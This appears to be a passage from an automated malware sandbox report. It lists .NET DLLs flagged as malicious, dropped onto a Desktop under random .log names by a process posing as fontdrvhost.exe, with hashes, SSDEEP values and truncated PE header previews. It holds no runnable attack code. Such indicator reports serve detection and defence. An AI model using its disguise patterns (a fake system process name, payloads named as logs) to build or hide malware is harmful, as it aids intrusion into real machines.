                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\ZklVGaxA.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\ZtZwWUdP.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\aABfDneW.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                  C:\Users\user\Desktop\aFyNQRuY.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\aLYWFcdp.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                  C:\Users\user\Desktop\aVjDvRpd.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\aYVnMXzh.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\auteTnDC.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\avWEvUWS.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\bAJNFhyM.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\bYjfzcZg.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\blWejAjG.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                  C:\Users\user\Desktop\cixmEAyA.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\cnAeDqUL.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\dKmMwLxf.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\dabMNWxu.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\dbVNVLdb.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\dpYUmTzI.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\eCwwaQCH.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\fLnmpTPV.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\feqUKmVF.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
